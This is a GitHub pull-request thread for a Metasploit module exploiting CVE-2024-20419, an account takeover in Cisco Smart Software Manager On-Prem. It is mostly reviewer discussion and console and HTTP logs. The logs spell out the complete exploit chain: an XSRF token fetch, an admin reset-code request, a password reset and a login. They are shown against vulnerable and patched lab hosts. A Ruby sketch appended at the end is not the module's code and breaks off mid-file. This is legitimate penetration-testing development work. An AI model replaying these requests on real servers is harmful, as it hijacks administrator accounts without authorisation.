Cisco Smart Software Manager (SSM) On-Prem Account Takeover (CVE-2024-20419) Module #19375
Conversation
Cisco SSM On-Prem Account Takeover (CVE-2024-20419)
Code cleanup and error handling added
Added error handling and made the code cleaner:
Added store_valid_credential
Code cleanup
Thanks for the PR, is it possible to add in a check method?
Thank you for reviewing the PR! If I remember correctly, I didn't see an endpoint that returned version information for fingerprinting. Did you see one that I could add?
code cleanup
Yes, I forgot to update the description from the original post. I've removed that part - the module should be good to go. :)
Hey @h4x-x0r, thanks for the module! I attempted to download the vulnerable version from Cisco but it appears it's no longer available.
Would you be able to send the vulnerable .iso to msfdev@metasploit.com? That would be greatly appreciated!
Once I get the vulnerable version installed I'd be happy to try and help write a check method, there might be a way to identify whether or not the target has been patched without obtaining version info. Thanks!
That's unfortunate; getting the affected software from a vendor always seems to be the biggest issue. Perhaps I could install a newer version which is patched, and see how the response differs when the relevant endpoints are queried, although it might not be too reliable across many different versions. Are you aware of some existing MSF modules that follow a similar approach for fingerprinting, in case the version information cannot be obtained directly from an unauthenticated context? On a related note, I have a couple of modules that exploit vulnerabilities in hardware devices (routers, switches, embedded servers, printers, etc.). I either had access to the hardware, or in some cases I did user-mode emulation or full system emulation to get the targets running, but the process is usually quite involved or may rely on custom code that I created to get it working (i.e., you might not have access to the vulnerable product to run the module against). In such cases, is the module code, documentation and console output of a successful run still sufficient to get it merged when I submit a PR?
Would you maybe be able to upload it to Google Drive and then email the link?
Yea! That's exactly what I was going to experiment with. Look for the differences in response codes / response bodies between the patched and unpatched versions. Here's an example of a check method checking for the presence of the patch via HTTP response codes and header values instead of version info: metasploit-framework/modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb Lines 79 to 94 in 25ee41d
Here's another example that's not HTTP related. metasploit-framework/modules/exploits/multi/http/apache_couchdb_erlang_rce.rb Lines 129 to 146 in 609d356
In those cases we do always prefer if you can either send the software for us to test or in the case of qemu user emulation if you can write out the steps you took to setup the target. Like what was done here: metasploit-framework/documentation/modules/exploit/linux/http/qnap_qts_rce_cve_2023_47218.md Lines 16 to 116 in 6c252de
That way other users can test the module and if any future work needs to be done on the module we have a guide on how to setup a test target. If you write a module for a physical device and there's no way for us to verify the module works / setup a test target on our end we can accept a
@jheysel-r7 I've sent two emails (the day before yesterday and yesterday), just wanted to check if you got them.
No problem, I've forwarded them to you directly.
Hey @h4x-x0r, thanks for the great module. A couple minor comments. Testing was as expected 👍
Check Method
I'd first suggest refactoring the four requests that are sent in the run method into their own methods because you'll need most of that functionality in the check method.
We want to avoid sending all 4 requests twice, so we can create instance variables in the check method like so:
@xsrf_token_value = get_xsrf_token_value
But because users have the ability to disable the check method it's not guaranteed they'll get set in the check method, so we can use a conditional assignment operator in the run method to set the instance variables if they're nil.
@xsrf_token_value ||= get_xsrf_token_value
A good example of this pattern can be found here:
metasploit-framework/modules/exploits/multi/http/apache_rocketmq_update_config.rb
Lines 125 to 129 in 429eaff
@version_request_response ||= send_version_request
@parsed_data ||= parse_rocketmq_data(@version_request_response)
@broker_port = get_broker_port(@parsed_data, datastore['rhost'], default_broker_port: datastore['BROKER_PORT'])
print_status("Executing target: #{target.name} with payload #{datastore['PAYLOAD']} on Broker port: #{@broker_port}")
execute_command("-c $@|sh . echo bash -c '#{payload.encoded}'", { broker_port: @broker_port })
I've included output from a vulnerable and non-vulnerable target. It looks like if the check method gets the xsrf_token and the auth_token it should be able to send a request to /backend/reset_password, and a patched target will respond with:
{"error":"Invalid Access","error_message":"Invalid Access"}
whereas a vulnerable target will respond with: {"status":"OK"}.
It's a bit of an invasive check method as it's exploiting the vuln and resetting the password; there might be a better way.
Vulnerable Cisco SSM 8
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40
####################
# Request:
####################
GET /backend/settings/oauth_adfs?hostname=luLnhy HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:34 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967214846
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"9082ef92676a7e2e1348fd860dd9af23"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV%2B88arzv7F9qZ5Au3vsFQS2eh7BmAQzm%2FiA%3D%3D; path=/, _lic_engine_session=41457e8c3072e315668f818961607fd5; path=/; HttpOnly
X-Request-Id: 7d18818c-4899-4b5d-aedb-f87918ed62aa
X-Runtime: 0.009177
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"enabled":false,"redirect":"https://luLnhy:8443/backend/auth/adfs"}
[+] Server reachable.
[+] Retrieved XSRF Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
####################
# Request:
####################
POST /backend/reset_password/generate_code HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV%2B88arzv7F9qZ5Au3vsFQS2eh7BmAQzm%2FiA%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Content-Type: application/json
Content-Length: 15
{"uid":"admin"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:34 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967214884
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"290c8043abcda9226d13c9088b82c312"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=JQxIs4XqBtpfs%2Fh5u0pLnoSEM8rwXDwlmXOjrMLpR%2BtYQEA48kJ8TDC7VUQTUc5tGAy1dDyCbBPPhm2HG8Odgg%3D%3D; path=/
X-Request-Id: 89365b5d-d64d-4f74-bbdc-fd42d3f32e86
X-Runtime: 0.022502
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"uid":"admin","auth_token":"5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95"}
[+] Retrieved auth_token: 5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95
####################
# Request:
####################
POST /backend/reset_password HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=JQxIs4XqBtpfs%2Fh5u0pLnoSEM8rwXDwlmXOjrMLpR%2BtYQEA48kJ8TDC7VUQTUc5tGAy1dDyCbBPPhm2HG8Odgg%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Content-Type: application/json
Content-Length: 189
{"uid":"admin","auth_token":"5883d528a6b63559c8e9a96edefc1204bd57c8231b17097f125e1d5ea5f3de95","password":"!1jUbfF9a2dxknM0P!","password_confirmation":"!1jUbfF9a2dxknM0P!","common_name":""}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:35 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967215118
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"3d23d39a30bb7323f8ccfd64c52cf286"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=AEfDGh64qAc2ASfNzqSTlYC1ZV5WJY9cl2MyX2o0iGR9C8uRaRDSkVkJivBmvxZmHD3j4Jr732rBlvx0sx5SDQ%3D%3D; path=/
X-Request-Id: 9123f82b-762a-4a86-a3df-5cc14a1af28c
X-Runtime: 0.223049
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"status":"OK"}
####################
# Request:
####################
POST /backend/auth/identity/callback HTTP/1.1
Host: 172.16.199.40:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=AEfDGh64qAc2ASfNzqSTlYC1ZV5WJY9cl2MyX2o0iGR9C8uRaRDSkVkJivBmvxZmHD3j4Jr732rBlvx0sx5SDQ%3D%3D; _lic_engine_session=41457e8c3072e315668f818961607fd5
X-Xsrf-Token: 2ZpLB7O8L22gEgIGUwxfaniDMQANjhtR9xnXq5oTZeGk1kOMxBRV+88arzv7F9qZ5Au3vsFQS2eh7BmAQzm/iA==
Accept: application/json
Content-Type: application/json
Content-Length: 52
{"username":"admin","password":"!1jUbfF9a2dxknM0P!"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:35 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967215564
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"053537117e54842d118b2d083c3ca797"
Cache-Control: max-age=0, private, must-revalidate
Set-Cookie: XSRF-TOKEN=la%2Fc1B2m7jH%2Fb1SLfYR%2FJ1SIT9on4duQ4pcN8P4B70Do49Rfag6Up5Bn%2BbbVn%2FrUyADJZOs%2Fi6a0YsPbJys1KQ%3D%3D; path=/
X-Request-Id: 32f7e171-fd70-42d1-8949-6f41c0daf9dc
X-Runtime: 0.431364
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"provider":"identity","email":"","uid":"admin","first_name":"Local","last_name":"Admin","display_name":"Local Admin","organization":null,"country":"UNITED_STATES","language":"ENGLISH","description":null,"account_status":1,"role":"admin","individual_system_role":"admin","admin":"admin","id":1,"session_key":"68ac590bb05690cbb2ebacc9fcb1c15d5b19bb62ac39e8d33e3240ca25eb54bd","sso_user_id":null,"password_expires_in":null}
[+] Password for the admin user was successfully updated: !1jUbfF9a2dxknM0P!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed
Patched Cisco SSM 9
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > set rhost 172.16.199.201
rhost => 172.16.199.201
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.201
####################
# Request:
####################
GET /backend/settings/oauth_adfs?hostname=mznLWl HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:54 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967234374
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"d38b0eae8cae5236d54cfce21dfdfc13"
Set-Cookie: XSRF-TOKEN=jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA%3D%3D; path=/; secure, _lic_engine_session=0e84f758847748e8f185cbd782272edf; path=/; secure; HttpOnly
X-Request-Id: 23786a7e-db94-43ab-a8e0-5e2bd3f1fad6
X-Runtime: 0.056111
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"enabled":false,"redirect":"https://mznLWl:8443/backend/auth/adfs"}
[+] Server reachable.
[+] Retrieved XSRF Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
####################
# Request:
####################
POST /backend/reset_password/generate_code HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA%3D%3D; _lic_engine_session=0e84f758847748e8f185cbd782272edf
X-Xsrf-Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
Content-Type: application/json
Content-Length: 15
{"uid":"admin"}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967235145
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"313ec556206adb59fae3cf597925a1d7"
Set-Cookie: XSRF-TOKEN=krzro9yNkEDQp7MI7PS9UqmHC61MTF2yuCRuExbh3Da%2F9VOXj8b6gI2Losj%2F%2F6%2Ber44DPGvdrIBn2g%2B7mmeUJA%3D%3D; path=/; secure
X-Request-Id: fef68288-74e5-48a9-84f8-3b35aafeb03b
X-Runtime: 0.473530
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"uid":"admin","auth_token":"2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3"}
[+] Retrieved auth_token: 2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3
####################
# Request:
####################
POST /backend/reset_password HTTP/1.1
Host: 172.16.199.201:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.4; rv:124.0) Gecko/20100101 Firefox/124.0
Cookie: XSRF-TOKEN=krzro9yNkEDQp7MI7PS9UqmHC61MTF2yuCRuExbh3Da%2F9VOXj8b6gI2Losj%2F%2F6%2Ber44DPGvdrIBn2g%2B7mmeUJA%3D%3D; _lic_engine_session=0e84f758847748e8f185cbd782272edf
X-Xsrf-Token: jk1GOsPi9SWb9GhOQJtjjYp9lZ3d2r3q4uNxCUY8WWKjBP4OkKmf5cbYeY5TkHFBjHSdDPpLTNg9HRChyroRcA==
Content-Type: application/json
Content-Length: 189
{"uid":"admin","auth_token":"2b094fef9c914a53828ee74e0160c39c04664a4f026cb9bba48a36b66feb16c3","password":"!1jUbfF9a2dxknM0P!","password_confirmation":"!1jUbfF9a2dxknM0P!","common_name":""}
####################
# Response:
####################
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Aug 2024 21:33:55 GMT
Content-Type: application/json; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Frame-Options: SAMEORIGIN, DENY
X-XSS-Protection: 1; mode=block, 1; mode=block
X-Content-Type-Options: nosniff, nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Cache-Control: no-cache, no-store
Pragma: no-cache
Expires: 0
X_CSL_CONNECT_INFO: {"name"=>"SSM", "version"=>"1.4", "additional_info"=>"", "production"=>true, "capabilities"=>["MULTITIER", "EXPORT_2", "DLC"]}
X_CSL_AGENT_ACTIONS:
X_CSL_NONCE:
X_CSL_TIMESTAMP: 1724967235227
X_CSL_MESSAGE_VERSION: 1.3
ETag: W/"f66db6cb240b6ce9d3427f6b845d8716"
Set-Cookie: XSRF-TOKEN=PoHLG%2FkyL8Zgv2FMOVqVnkrcb8gcY0SixuCKUFAqTxITyHMvqnlFBj2TcIwqUYdSTNVnWTvytZAZHuv43KwHAA%3D%3D; path=/; secure
X-Request-Id: ff2f7cb4-555c-4ce0-a49e-92326972b401
X-Runtime: 0.051686
Vary: Origin
Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
{"error":"Invalid Access","error_message":"Invalid Access"}
[-] Auxiliary aborted due to failure: unexpected-reply: Invalid Access
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) >
Testing
Afterwards, I was able to log in to the application with the password in the NEW_PASSWORD datastore option.
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[+] Server reachable.
[+] Retrieved XSRF Token: foPj5oBEWs/Pbc5epBuLIW/22ionCaJv5R1c+IO7rpkFaWsERZZXEiG8FU+OmhM0meDWgS/Psc27Lx0LJorb6Q==
[+] Retrieved auth_token: 25ed4c1377c5e68b6740d010663f4a95ec2074c2ce37f0b7c904dc9093365ea2
[+] Password for the admin user was successfully updated: !1jUbfF9a2dxknM0P!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed
Cleanup and check method added
@jheysel-r7 Thank you for your review and feedback, much appreciated. Also apologies for my late reply. I still need to review the check method based on your suggestions. The current draft sends the requests twice, but I'll update it later, using instance variables like you recommended. Your output of the vulnerable and patched version was helpful. I've also installed a patched version, and confirmed that it generally works:
Refactored code to remove duplicate requests
@jheysel-r7 I've updated the module to remove the duplicate requests. Thanks again for your feedback.
Hey @h4x-x0r, thanks for making all of those changes. They look great.
One thing I forgot to mention. When the check method shares functionality with the run or exploit method like this, you have to be careful to ensure that the check method is still always returning a CheckCode. If one of the methods called by the check method executes a fail_with, the check method will not be able to return a CheckCode. To work around this issue we can define some custom errors, have the methods raise these errors and then handle those errors accordingly in both the check and run methods.
I've pushed this change along with a few other minor fixes in f254eeb.
Testing
Error handling testing
I hardcoded some values to induce and test the error handling:
Check method handling:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, Failed to get a 200 response from the server. "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, XSRF Token not found "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: l2G/NLWAcqMg1nO1tRDyeUJI5Il/stIvc+ljsYi3Fj1mEkkk3j1PgHzCjnZVeECvOV91IT1nCEVnRzyvnUGWhA==
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::AuthTokenError, Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: 2jUjI/jPLdS8S2ktrVV6hKFthpHGm3JPSAAt2k4fO/fVFFzUDgui42iFW/ilya2ICVAf6SuKe53Cj4j2ytklvg==
[+] Retrieved auth_token: 12090a926c5ceccfb850b76f0b2fa273d8c2e9e9aaa5d56ebf2c6095d5880ae4
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, Did not receive a 200 responce from backend/reset_password "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
Run method error handling:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, Failed to get a 200 response from the server.
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::XsrfTokenError, XSRF Token not found
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: MZOn/v5A2HfHp6c5d0DlyXUVKWso+y0B1mEGvBrIzHVUe2vm3rhlzg6GxtHI02C5i+E7tRqXSq5gIC5VDcc37A==
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::AuthTokenError, Request /backend/reset_password/generate_code to retrieve auth_token did not return a 200 response
[*] Auxiliary module execution completed
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: HOti6Sne63dXErPIBkHwc5pEiXTMiQe/9UCNYvPUILOk0iesmWcuzunmf5tNM1nczCaNytGBvss9MdxvmFJupw==
[+] Retrieved auth_token: 60f4890d5bb36eab94c776b8f8e469506be1122a4e77ce4155f7dc214aa4f9d8
[-] Auxiliary aborted due to failure: unexpected-reply: Exploit pre-conditions were not met Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, Did not receive a 200 responce from backend/reset_password
[*] Auxiliary module execution completed
Testing was as expected on a vulnerable version:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.40
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: U4WTxHe4jHbgxH2TYLDyXqttSdPLET1MteWfS5nx7eTdbpmgue9rTTps1SVDawewbOk0ZWahrQXvB824sRDqCg==
[+] Retrieved auth_token: 806cc091a24b78f7bb9e19b4e28b641aecc6781aec101f4a0f16de9f6f3d2b06
[+] The target appears to be vulnerable.
[+] Password for the admin user was successfully updated: t9YKVWigDO2y1Tkc!
[+] Login at: https://172.16.199.40:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed
AutoCheck set to false:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > rexploit
[*] Reloading module...
[*] Running module against 172.16.199.50
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: 3SQKRCpHP9j2xSoY/471jNScqjeCsy24+mhlx5oXhmbzXGW5h/Ov3WEyVCwNVXO6iNgGUiiS9IcUNbrQTnOlWQ==
[+] Retrieved auth_token: 455cdc53c6a1336bba8a01049057ab420b2b6e3447093a7abd5b87de393bb9e7
[+] Password for the admin user was successfully updated: asdfasdfASDASDASD39!
[+] Login at: https://172.16.199.50:8443/#/logIn?redirectURL=%2F
[*] Auxiliary module execution completed
json = res.get_json_document
raise ResetPasswordError, "There was an error resetting the password: #{json['error_message']}" if json['error_message']
Before this check was added, if AutoCheck was set to false and the NEW_PASSWORD did not contain an upper case letter, the module would fail with a non-descriptive error message, because an error response has a response code of 200. The module would continue, the response to backend/auth/identity/callback would also be a 200, and the error message would be:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.40
[!] AutoCheck is disabled, proceeding with exploitation
[+] Server reachable.
[+] Retrieved XSRF Token: N8bloAwZoPRD4kPc3Vl0XNOps4Yideqk0ro75xul5Sohz2M1xjTp08KNB0H5D2mpp6/sFtckmmP1LvPddCbMHg==
[+] Retrieved auth_token: b1d17afaac83730edac30dd2242eafc0adc0da4ef9b505ba5d0682c220f75b6b
[-] Auxiliary aborted due to failure: unexpected-reply: The requested user is not found.
[*] Auxiliary module execution completed
Now this error message is displayed like so:
msf6 auxiliary(admin/http/cisco_ssm_onprem_account) > run
[*] Running module against 172.16.199.50
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Server reachable.
[+] Retrieved XSRF Token: amUaFSgVZhNwx5qSUdX4Qv5ZVh4nPk8jsTv2etORqHP6oHbOYqRgt7UNQ1lYETgu2sZzw8Ja30Rqp12a9UbmjQ==
[+] Retrieved auth_token: 791252bb6a863cc21967d30c11b1a599efda1a100d45f6d8685145f52c8087ed
[-] Auxiliary aborted due to failure: unknown: Cannot reliably check exploitability. Check method failed: Msf::Modules::Auxiliary__Admin__Http__Cisco_ssm_onprem_account::MetasploitModule::ResetPasswordError, There was an error resetting the password: Password should contain at least one uppercase and one lower case "set ForceExploit true" to override check result.
[*] Auxiliary module execution completed
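The structure these review comments describe (tokens fetched in check reused via `||=` in run, helpers raising custom errors so check always returns a CheckCode, and the HTTP 200 error_message case), as a standalone Ruby sketch added here; it is not the module's or the framework's code. CheckCode, fail_with, FakeTarget and every response are stand-ins and constructed sample data modelled on the output above, and treating "Invalid Access" as the patched signature is an assumption.

```ruby
# Standalone sketch (not Metasploit code) of the structure the review describes:
# shared request helpers raise custom errors, check maps them to a CheckCode,
# and run uses ||= so tokens fetched by check are not requested a second time.
require 'json'
require 'cgi'
module CheckCode  # stand-in for the framework's CheckCode values
  Vulnerable = 'vulnerable'; Safe = 'safe'; Unknown = 'unknown'
end
class ExploitAborted < StandardError; end  # what the fail_with stand-in raises
class XsrfTokenError < StandardError; end
class AuthTokenError < StandardError; end
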